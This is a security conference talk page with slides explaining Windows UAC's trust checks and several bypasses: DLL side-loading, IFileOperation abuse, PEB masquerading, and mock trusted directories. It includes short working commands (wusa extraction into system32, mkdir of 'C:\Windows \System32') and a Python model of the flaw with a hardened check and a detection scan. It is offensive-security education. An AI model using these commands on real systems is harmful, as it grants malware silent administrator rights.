SITCON: Playing Win32 Like a K!NG ;)

adr
August 08, 2020

Since Windows Vista the operating system has shipped with UAC (User Account Control), which was meant to be one of the most important lines of defense against malware, blocking the harmful actions of unknown programs on our behalf. Reality tells a grimmer story: UAC has become an annoying pop-up that asks the user for consent, and it has failed to stop countless malware attacks.

This session introduces the Maginot Line of Microsoft's protection architecture on Windows, how Win32 processes are loaded, a reverse-engineering analysis of the UAC implementation, the security assumptions Microsoft made when designing UAC, and how the masters blow right through your UAC protection.

sysDoor: gist.github.com/aaaddress1/6c4276155104a5b7df9ab15221c91f69

Transcript

  1. SITCON: Playing Win32 Like a K!NG ;) aaaddress1@chroot.org
  2. #Windows #Reversing #Pwn #Exploit $man
     • Master's degree at CSIE, NTUST
     • Security Researcher - chrO.ot
     • Speaker - BlackHat, DEFCON, VXCON, HITCON
     • aaaddress1@chroot.org
     • Hao's Arsenal
  3. /?outline
     1. UAC Design
     2. Exploit Attacks
        1. Misc Method
        2. CIA Vault7: Elevated COM Object Method
        3. UAC Bypass by Mocking Trusted Directories
     3. Recap
  4. 〉〉〉UAC Design

  5. /?UAC

  7. (diagram) Ring3 / Ring0 boundary crossed by syscall. Explorer (A.) RunAs → sends a task by RPC message to the UAC service, asking it to create a child process with a different privilege level. UAC Service (B.) RPC → trust_authA → consent.exe → trust_authB → privileged child process
  8. /?auth_a • TrustAuth_A # trust path verify
     - $p = ToDosName("C:\\a.exe")   # \??\C:\a.exe
     - $p.startswith(\??\C:\Windows\System32) or $p.startswith(\??\C:\Windows\SysWoW64)
     - deny-list
  9. /?auth_b • TrustAuth_B
     - whitelisted *.exe with M$ signature
     - or autoElevate marked as TRUE in the manifest XML
  10. /?Bypass • UAC: what the Emperor doesn't grant, you can't take!
     • TrustAuth_A # binary from the trusted zone?
       A. launched from the system directory
       B. whitelisted + signed by M$
     • TrustAuth_B # should it be elevated?
       C. marked as auto-elevated or whitelisted
     PS C:\> sigcheck.exe -m C:\Windows\System32\Taskmgr.exe
     So now... we have a nice list of targets
  11. /?attack • Misc: tricks seen in the wild ✨ • CIA: Elevated COM Object Method • Mocking Trusted Directories
  12. /?misc#1 Accessing Access Tokens for UIAccess www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html Press OK for you automatically? No effort at all.

  13. /?misc#2 • So can we get a high-privilege service to call us directly? • Bypassing UAC on Windows 10 using Disk Cleanup enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup
  14. /?misc#3 • Extract an archive straight over the system binaries $ wusa hack.cab /extract:C:\windows\system32 msitpros.com/?p=3100

  15. 〉〉〉IFileOperation

  16. /?RunAs consent.exe

  17. /?fileCopy

  18. /?alert

  19. /?hijack (diagram) 'PE' Opt Header: .EntryPoint, .ImageBase; Section Data: .text, .rdata, .idata. a.exe Process: PEB, PE Module, ntdll.dll, VERSION.dll, user32.dll ... LoadLibrary() search $PATH for C:\hijack\a.exe: { "C:\hijack\VERSION.dll", "C:\Windows\System32\VERSION.dll", "C:\Windows\SysWoW64\VERSION.dll", ... }
  20. /?bypass#1
     • DLL Side-Loading → hijack auto-elevated Windows services by dropping a malicious *.dll binary
     • IFileOperation → arbitrary file write if you're Explorer → drop a *.dll into C:\windows\system32 to hijack
     • DLL Injection → do things as Explorer https://github.com/hjc4869/UacBypass
  21. /?bypass#1 (diagram) malware → explorer.exe process (ntdll.dll, kernel32.dll, user32.dll, malware.dll) → system32\cliconfg.exe
     (a.) inject the *.dll module into Explorer
     (b.) create a new thread to wake the malware up
     (c.) drop a *.dll into %system32% to hijack the service
     (d.) get privileges via the DLL hijack
  22. /?bypass4what
     • Change the Windows product key → the hacker can activate a genuine Windows for you!
     • Run the disk management tool → PC slow, too much junk? The hacker defragments your disk for you
     • Remove your antivirus → think the AV slows your PC down? No problem, the hacker deletes it for you (⁎⁍̴̛ᴗ⁍̴̛⁎)
     • Write a startup entry → the hacker can plant a backdoor that auto-starts at boot and watches over you ;)
  23. /?MasqueradePEB (diagram) Source.cpp → Compiler → 'MZ' / Opt Header (ImageBase) / .text .rdata .idata → Application Loader → Process: EntryPoint, PE Module, PEB "C:\Windows\explorer.exe"
  24. /?bypass#2
     • DLL Side-Loading → hijack auto-elevated Windows services by dropping a malicious *.dll binary
     • IFileOperation + MasqueradePEB → arbitrary file write as Explorer → drop a *.dll into C:\windows\system32 to hijack
  26. /?bypass#2 (diagram) malware.exe process (ntdll.dll, kernel32.dll, user32.dll; PEB "C:\Windows\explorer.exe") → system32\cliconfg.exe
     (a.) masquerade the current path as explorer.exe
     (b.) drop a *.dll into %system32% to hijack the service
     (c.) get privileges via the DLL hijack
  27. /?WikiLeaks Vault 7: CIA Hacking Tools Revealed wikileaks.org/ciav7p1/cms/page_3375231.html

  28. /?IFileOperation http://d1iv3.me/2017/08/11/Bypass-UAC-方法研究/

  31. /?WikiLeaks Vault 7: CIA Hacking Tools Revealed wikileaks.org/ciav7p1/cms/page_3375231.html M$ patched this vulnerability after Windows 10 version 1607 (including the known *.dll files that led to the hijack)
  33. 〉〉〉Mocking Directory

  36. /?DACL

  38. /?DACL
     $ mkdir "C:\Windows \"
     $ mkdir "C:\Windows \System32"

  40. /?auth_a
     RtlDosPathNameToRelativeNtPathName_U_WithStatus( GetLongPathNameW(L"C:\Windows \System32\a.exe") )
     → RtlDosPathNameToRelativeNtPathName_U_WithStatus( L"C:\Windows\System32\a.exe" )
     → $p = L"\??\C:\Windows\System32\a.exe"
     AiLaunchProcess(L"C:\Windows \System32\a.exe")
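
The trusted-path check on slides 8 and 40 and the mock directory from slide 38, as an added example in Python (not code from the talk, from sysDoor, or from Windows): a model of the appinfo decision from slide 7, the trailing-space bypass in which the normalised string is checked but the raw string is launched, a hardened variant that decides on exactly the string it will hand to AiLaunchProcess, and a defender-side scan for mock directories. The function names, the fake file system, the deny-list placeholder and the empty whitelist are all constructed; the normalisation helper only reproduces the effect slide 40 shows for GetLongPathNameW and does not model relative segments or on-disk lookup.

```python
# Added illustration, not code from the talk, sysDoor, or Windows.
# Models the appinfo "trusted directory" check (slides 8/9), the
# trailing-space mock-directory bypass (slides 38/40), a hardened check,
# and a defender-side scan. All names and data below are constructed.

TRUSTED_DIRS = ("\\??\\c:\\windows\\system32\\", "\\??\\c:\\windows\\syswow64\\")
# The talk only says a deny-list exists; this entry is a placeholder.
DENY_LIST = {"\\??\\c:\\windows\\system32\\denied-example.exe"}
MS_SIGNED_WHITELIST = set()  # real entries are not given on the page

# Constructed file system: the attacker copied a Microsoft auto-elevate
# binary into "C:\Windows \System32" (note the trailing space), a directory
# the attacker can write to, so DLLs beside it are under attacker control.
FAKE_FS = {
    r"c:\windows\system32\taskmgr.exe":  {"autoelevate": True,  "ms_signed": True,  "dir_writable": False},
    r"c:\windows \system32\taskmgr.exe": {"autoelevate": True,  "ms_signed": True,  "dir_writable": True},
    r"c:\users\bob\a.exe":               {"autoelevate": False, "ms_signed": False, "dir_writable": True},
}


def long_path_model(dos_path):
    """Model of GetLongPathNameW as slide 40 shows it: Win32 normalisation
    drops trailing spaces and dots from each component, so
    "C:\\Windows \\System32\\x.exe" collapses onto the real System32 path.
    Relative segments ("..") are deliberately not modelled."""
    return "\\".join(p.rstrip(" .") for p in dos_path.split("\\"))


def to_nt_path(dos_path):
    """Model of RtlDosPathNameToRelativeNtPathName_U: DOS path -> \\??\\ form,
    lower-cased because the object manager compares case-insensitively."""
    return ("\\??\\" + dos_path).lower()


def trust_auth_a_flawed(dos_path):
    """TrustAuth_A as the slides describe it: normalise first, then
    prefix-match. The normalised string is checked; the raw one is launched."""
    nt = to_nt_path(long_path_model(dos_path))
    return nt.startswith(TRUSTED_DIRS) and nt not in DENY_LIST


def trust_auth_a_hardened(dos_path):
    """Decide on the exact string that will be handed to AiLaunchProcess:
    refuse anything normalisation would rewrite, refuse relative segments,
    then prefix-match the raw path, so check and use see the same file."""
    if long_path_model(dos_path) != dos_path:
        return False
    if any(p in ("", ".", "..") for p in dos_path.split("\\")[1:]):
        return False
    nt = to_nt_path(dos_path)
    return nt.startswith(TRUSTED_DIRS) and nt not in DENY_LIST


def trust_auth_b(dos_path):
    """TrustAuth_B (slide 9): autoElevate=true in the manifest, or a
    Microsoft-signed binary on the whitelist. This is a property of the
    file's own contents, so a copied binary keeps it."""
    f = FAKE_FS.get(dos_path.lower())
    if f is None:
        return False
    return f["autoelevate"] or (f["ms_signed"] and dos_path.lower() in MS_SIGNED_WHITELIST)


def appinfo_decision(dos_path, auth_a=trust_auth_a_flawed):
    """Model of the service flow on slide 7: both checks pass -> privileged
    child without consent.exe. The child loads DLLs from its own directory,
    so a writable directory means attacker code at high integrity."""
    f = FAKE_FS.get(dos_path.lower())
    if f is None:
        return "not found"
    if not (auth_a(dos_path) and trust_auth_b(dos_path)):
        return "prompt"
    return "silent elevation, side-loadable" if f["dir_writable"] else "silent elevation"


def find_mock_directories(names):
    """Defender check over the entries of one directory (e.g. C:\\): names
    that normalisation would fold onto a sibling, such as "Windows "."""
    canonical = {n.lower() for n in names}
    return sorted(n for n in names
                  if n != n.rstrip(" .") and n.rstrip(" .").lower() in canonical)


if __name__ == "__main__":
    mock = r"C:\Windows \System32\Taskmgr.exe"
    print("flawed  :", appinfo_decision(mock))
    print("hardened:", appinfo_decision(mock, trust_auth_a_hardened))
    print("mock dirs:", find_mock_directories(["Program Files", "Windows", "Windows ", "Users"]))
```

The hardened variant does not try to be smarter about normalisation; it refuses to decide on any string that normalisation would change, which removes the gap between the path that was checked and the path that is launched. The scan at the end is the cheap hunt a defender can run against the root of the system drive: a directory whose name only differs from a sibling by trailing spaces or dots has no legitimate reason to exist.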
  41. /?attack
     • TrustAuth_A - Path Normalization Issues
     • TrustAuth_B - Whitelisted EXE Files with Trusted Signature / AutoElevated Marked EXE Files → DLL Side-Loading Tricks to hijack Windows services
     • UAC Bypass by Mocking Trusted Directories
  42. 〉〉〉Recap

  43. /?HITCON www.youtube.com/watch?v=6LUo-Crd9pc

  44. /?recap
     • UAC Design
       - auth_a: *.exe launched from the system directory
       - auth_b: marked as AutoElevated
     • Bypass Tricks
       - Issue: IFileOperation, Path Normalization
       - DLL Side-Loading
       - Code Inject / MasqueradePEB
       - DEFCON 25: UAC 0day, all day! by @FuzzySec
  45. /?HITCON

  46. Universal hijacking · local privilege escalation · intelligence infiltration · cross-level injection · remote backdoor · cyber-army operations. Thanks! Slides: GitHub @aaaddress1 / Facebook